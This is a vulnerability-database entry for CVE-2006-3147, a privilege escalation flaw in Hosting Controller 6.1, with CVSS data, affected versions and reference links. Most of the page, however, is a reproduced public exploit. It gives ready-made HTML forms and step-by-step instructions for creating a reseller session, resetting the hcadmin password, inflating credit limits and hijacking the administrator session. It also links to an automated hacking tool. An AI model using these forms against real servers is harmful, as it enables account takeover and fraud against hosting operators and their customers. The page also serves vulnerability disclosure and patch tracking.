CVE-2006-3147
CVSS 6.5
Published: 2006-06-22 18:06:00
Last revised: 2011-03-07 21:37:57

[Original] Unspecified vulnerability in Hosting Controller before 6.1 (aka Hotfix 3.2) allows remote authenticated attackers to gain host admin privileges, list all resellers, or change resellers' passwords via unspecified vectors. NOTE: due to the lack of precise details, it is not clear whether this is related to a previously disclosed issue such as CVE-2005-1788.


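[CNNVD] Hosting Controller unspecified vulnerability (CNNVD-200606-452)

        Hosting Controller 6.1 (aka Hotfix 3.2) contains an unspecified vulnerability. A remote authenticated attacker can, via unspecified vectors, gain host admin privileges, list all resellers, or change resellers' passwords.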

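- CVSS (base score)

CVSS score: 6.5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)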

cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_1.9
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.9
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.8
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.1
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.0
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.3
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_1.7
cpe:/a:hosting_controller:hosting_controller:6.1
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_1.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3147
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3147
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-452
(official data source) CNNVD

- Other links and resources

http://secunia.com/advisories/20743
(VENDOR_ADVISORY)  SECUNIA  20743
http://hostingcontroller.com/english/logs/hotfixlogv61_3_2.html
(PATCH)  CONFIRM  http://hostingcontroller.com/english/logs/hotfixlogv61_3_2.html
http://xforce.iss.net/xforce/xfdb/27340
(UNKNOWN)  XF  hosting-controller-admin-gain-privileges(27340)
http://www.vupen.com/english/advisories/2006/2459
(UNKNOWN)  VUPEN  ADV-2006-2459
http://www.securityfocus.com/bid/18565
(UNKNOWN)  BID  18565
http://www.osvdb.org/26693
(UNKNOWN)  OSVDB  26693
http://securitytracker.com/id?1016444
(UNKNOWN)  SECTRACK  1016444

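- Vulnerability information

Hosting Controller unspecified vulnerability
Medium severity  Access validation error
2006-06-22 00:00:00 2006-08-16 00:00:00
Remote
        Hosting Controller 6.1 (aka Hotfix 3.2) contains an unspecified vulnerability. A remote authenticated attacker can, via unspecified vectors, gain host admin privileges, list all resellers, or change resellers' passwords.

- Advisories and patches

        No data available

- Vulnerability information (1987)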

Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability (EDBID:1987)
asp webapps
2006-07-06 Verified
0 Soroush Dalili
N/A
Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005, Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006

-------------------------------------------------------------------------------------
===============================================
1- This code gives a resadmin session to a user:
Bug in "hosting/addreseller.asp": no checker is available.
---------------------------------------------------

<script>
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit()
}
</script>
<hr><br>
Form1<br>
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
<tr>
<td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td>
</tr>
<tr>
<td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="text" name="Password" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>last_name</td>
<td><input type="text" name="last_name" value=""></td>
</tr>
<tr>
<td>address</td>
<td><input type="text" name="address" value=""></td>
</tr>
<tr>
<td>city</td>
<td><input type="text" name="city" value=""></td>
</tr>
<tr>
<td>state</td>
<td><input type="text" name="state" value=""></td>
</tr>
<tr>
<td>country</td>
<td><input type="text" name="country" value=""></td>
</tr>
<tr>
<td>email</td>
<td><input type="text" name="email" value=""></td>
</tr>
<tr>
<td>phone</td>
<td><input type="text" name="phone" value=""></td>
</tr>
<tr>
<td>fax</td>
<td><input type="text" name="fax" value=""></td>
</tr>
<tr>
<td>zip</td>
<td><input type="text" name="zip" value=""></td>
</tr>
<tr>
<td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td>
</tr>
<tr>
<td>selYear</td>
<td><input type="text" name="selYear" value=""></td>
</tr>
<tr>
<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>
---------------------------------------------------
===============================================
2- This code lists all of the resellers; then you must change the password of one of them and log in with it for the next step.
Note: Also with this code, everyone can increase their Credit value and then buy every host.
---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
3- Now you must log in as the reseller whose password was changed in the last step. Now go to the userlist; if there is a user, that will be enough, and if no user is available, you must make one!
Now select it and click Enter to enter as that user. Now the bug will be available:
each reseller can gain every user session, even "HCADMIN", through a bug in "Check_Password.asp".
The code below will help you:
---------------------------------------------------
<hr><br>
Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================

-------------------------------------------------------------------------------------

Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from: 
	Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
	Small.Mouse from Shabgard.org  (small.mouse[4t]yahoo[d0t]com)
	Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
	http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
	http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)

# milw0rm.com [2006-07-06]
		

- Vulnerability information

26693
Hosting Controller Authenticated User Privilege Escalation
Remote / Network Access Authentication Management, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

Hosting Controller contains a flaw that may allow a malicious user to gain access to unauthorized privileges and list all resellers or change their passwords. The issue is triggered when unspecified errors occur. This flaw may lead to a loss of Confidentiality and Integrity.

- Timeline

2006-06-20 Unknown
2006-06-20 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Hosting Controller has released a patch to address this vulnerability.

- Related references

- Vulnerability author

 

 
